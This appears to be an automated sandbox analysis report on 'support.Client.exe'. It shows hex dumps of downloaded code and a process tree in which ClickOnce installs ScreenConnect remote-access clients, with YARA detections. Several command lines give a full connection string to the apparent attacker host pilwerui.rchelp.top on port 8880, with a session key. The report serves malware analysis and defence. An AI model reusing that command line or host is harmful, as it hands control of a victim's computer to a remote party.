                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 2a 5e 03 75 3f 00 00 02 2c 0d 02 03 a5 3f 00 00 02 28 ef 00 00 06 2a 16 2a 0a 17 2a 3e 02 03 7d 99 00 00 04 02 04 7d 9a 00 00 04 2a 1e 02 7b 99 00 00 04 2a 22 02 03 7d 99 00 00 04 2a 1e 02 7b 9a 00 00 04 2a 22 02 03 7d 9a 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 4f 02 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 00 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 50 00 00 00 0e 00 00 11 03 72 7f 02 00 70 6f 76 00 00 0a 26 03 02 28 f1 00 00 06 0a 12 00 fe 16 49 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 03 72 9f 02 00 70 6f 76 00 00 0a 26 03 02 28 f3 00 00 06 0b 12 01 fe 16 1b 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 f8 00
                                                                                                                  Data Ascii: *^u?,?(***>}}*{*"}*{*"}*0@surOpov&rYpov&(, ow&}ow&o)*0Prpov&(Io)ov&rpov&(o)ov&*.(
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 73 75 00 00 0a 0a 06 72 cf 03 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 2d 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 77 00 00 00 11 00 00 11 03 72 09 04 00 70 6f 76 00 00 0a 26 03 02 28 26 01 00 06 0a 12 00 fe 16 b1 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 03 72 25 04 00 70 6f 76 00 00 0a 26 03 02 28 28 01 00 06 0b 12 01 fe 16 b2 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 03 72 59 04 00 70 6f 76 00 00 0a 26 03 02 28 2a 01 00 06 0c 12 02 fe 16 b3 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 2f 01 00 06 16 fe 01 2a 26 0f 00 03 28 32 01 00 06 2a fe 28 8b 00 00 0a 02 7b a1 00 00 04 6f 8c 00 00 0a 20 29 55 55 a5 5a 28 8d 00 00 0a 02 7b a2 00 00 04 6f 8e 00 00
                                                                                                                  Data Ascii: surpov&rYpov&(-, ow&}ow&o)*0wrpov&(&o)ov&r%pov&((o)ov&rYpov&(*o)ov&*.(/*&(2*({o )UUZ({o
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 28 61 01 00 06 2a 46 28 8b 00 00 0a 02 7b a6 00 00 04 6f 8c 00 00 0a 2a 5e 03 75 4b 00 00 02 2c 0d 02 03 a5 4b 00 00 02 28 61 01 00 06 2a 16 2a 5e 28 8b 00 00 0a 02 7b a6 00 00 04 03 7b a6 00 00 04 6f 91 00 00 0a 2a 26 03 02 28 59 01 00 06 52 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 9b 05 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 67 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 12 00 00 11 03 72 25 05 00 70 6f 76 00 00 0a 26 03 02 28 64 01 00 06 0a 12 00 fe 16 b1 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 69 01 00 06 16 fe 01 2a 26 0f 00
                                                                                                                  Data Ascii: (a*F({o*^uK,K(a**^({{o*&(YR*"}*{*"}*0@surpov&rYpov&(g, ow&}ow&o)*0)r%pov&(do)ov&*.(i*&
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 9e 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 a0 01 00 06 16 fe 01 2a 26 0f 00 03 28 a3 01 00 06 2a 0a 16 2a 5e 03 75 52 00 00 02 2c 0d 02 03 a5 52 00 00 02 28 a3 01 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 09 07 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 a5 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 a7 01 00 06 16 fe 01 2a 26 0f 00 03 28 aa 01 00 06 2a 0a 16 2a 5e 03 75 53 00 00 02 2c 0d 02 03 a5 53 00 00 02 28 aa 01 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73
                                                                                                                  Data Ascii: pov&rYpov&(, ow&}ow&o)**.(*&(**^uR,R(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^uS,S(***0@s
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 0f 00 03 28 e1 01 00 06 2a a2 28 7c 00 00 0a 02 7b ad 00 00 04 6f 7d 00 00 0a 20 29 55 55 a5 5a 28 94 00 00 0a 02 7b ae 00 00 04 6f 95 00 00 0a 58 2a 5e 03 75 59 00 00 02 2c 0d 02 03 a5 59 00 00 02 28 e1 01 00 06 2a 16 2a c6 28 7c 00 00 0a 02 7b ad 00 00 04 03 7b ad 00 00 04 6f 7e 00 00 0a 2c 17 28 94 00 00 0a 02 7b ae 00 00 04 03 7b ae 00 00 04 6f 96 00 00 0a 2a 16 2a 56 03 02 28 d7 01 00 06 51 04 02 28 d9 01 00 06 81 4b 00 00 01 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 9b 08 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 e4 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 e6 01 00 06 16 fe 01 2a 26 0f 00 03 28 e9 01 00 06 2a 0a 16 2a 5e 03
                                                                                                                  Data Ascii: (*(|{o} )UUZ({oX*^uY,Y(**(|{{o~,({{o**V(Q(K*0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^
                                                                                                                  2025-04-12 15:58:16 UTC1369INData Raw: 0a 0a 06 72 f5 09 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 20 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 6e 03 72 25 0a 00 70 6f 76 00 00 0a 26 03 02 28 1d 02 00 06 6f 7b 00 00 0a 26 17 2a 2e 02 03 28 22 02 00 06 16 fe 01 2a 26 0f 00 03 28 25 02 00 06 2a 46 28 7c 00 00 0a 02 7b b1 00 00 04 6f 7d 00 00 0a 2a 5e 03 75 61 00 00 02 2c 0d 02 03 a5 61 00 00 02 28 25 02 00 06 2a 16 2a 5e 28 7c 00 00 0a 02 7b b1 00 00 04 03 7b b1 00 00 04 6f 7e 00 00 0a 2a 26 03 02 28 1d 02 00 06 51 2a 22 02 03 7d b2 00 00 04 2a 1e 02 7b b2 00 00 04 2a 22 02 03 7d b2 00 00 04 2a 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 3d 0a 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02
                                                                                                                  Data Ascii: rpov&rYpov&( , ow&}ow&o)*nr%pov&(o{&*.("*&(%*F(|{o}*^ua,a(%**^(|{{o~*&(Q*"}*{*"}*0@sur=pov&rYpov&


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:11:57:54
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Users\user\Desktop\support.Client.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\support.Client.exe"
                                                                                                                  Imagebase:0x4e0000
                                                                                                                  File size:84'376 bytes
                                                                                                                  MD5 hash:944760EEF8A88F6CFA16FD094DF736DA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:11:57:54
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                  Imagebase:0x1c1e1df0000
                                                                                                                  File size:18'320 bytes
                                                                                                                  MD5 hash:4F6DD827B5F1F532A6AAF1316615DB29
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.3936944841.000001C1FEF44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:11:57:55
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  Imagebase:0x7ff756bc0000
                                                                                                                  File size:79'920 bytes
                                                                                                                  MD5 hash:8EC922C7A58A8701AB481B7BE9644536
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:11:57:55
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 964 -ip 964
                                                                                                                  Imagebase:0x910000
                                                                                                                  File size:522'624 bytes
                                                                                                                  MD5 hash:AA47AAA34035C6EB09F8ACA062E66C9D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:11:57:55
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 800
                                                                                                                  Imagebase:0x910000
                                                                                                                  File size:522'624 bytes
                                                                                                                  MD5 hash:AA47AAA34035C6EB09F8ACA062E66C9D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:11:58:00
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7bdef0000
                                                                                                                  File size:1'040'384 bytes
                                                                                                                  MD5 hash:9698384842DA735D80D278A427A229AB
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:11:58:13
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                  Imagebase:0x7ff756bc0000
                                                                                                                  File size:79'920 bytes
                                                                                                                  MD5 hash:8EC922C7A58A8701AB481B7BE9644536
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:11:58:14
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
                                                                                                                  Imagebase:0x7ff756bc0000
                                                                                                                  File size:79'920 bytes
                                                                                                                  MD5 hash:8EC922C7A58A8701AB481B7BE9644536
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:11:58:14
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WFDSConMgrSvc
                                                                                                                  Imagebase:0x7ff756bc0000
                                                                                                                  File size:79'920 bytes
                                                                                                                  MD5 hash:8EC922C7A58A8701AB481B7BE9644536
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:11:58:17
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe"
                                                                                                                  Imagebase:0x500000
                                                                                                                  File size:602'392 bytes
                                                                                                                  MD5 hash:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000F.00000002.3152147048.000000001B2EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000F.00000002.3150883243.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:11:58:18
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1"
                                                                                                                  Imagebase:0xba0000
                                                                                                                  File size:95'512 bytes
                                                                                                                  MD5 hash:D3E628C507DC331BAB3DE1178088C978
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:11:58:18
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1"
                                                                                                                  Imagebase:0xba0000
                                                                                                                  File size:95'512 bytes
                                                                                                                  MD5 hash:D3E628C507DC331BAB3DE1178088C978
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:11:58:19
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "9515c91f-1be5-4b93-b357-5a2d77e27f0d" "User"
                                                                                                                  Imagebase:0x2f0000
                                                                                                                  File size:602'392 bytes
                                                                                                                  MD5 hash:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:11:58:20
                                                                                                                  Start date:12/04/2025
                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "67690a9d-de46-40e6-b1a1-8264d8889408" "System"
                                                                                                                  Imagebase:0xb00000
                                                                                                                  File size:602'392 bytes
                                                                                                                  MD5 hash:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  No disassembly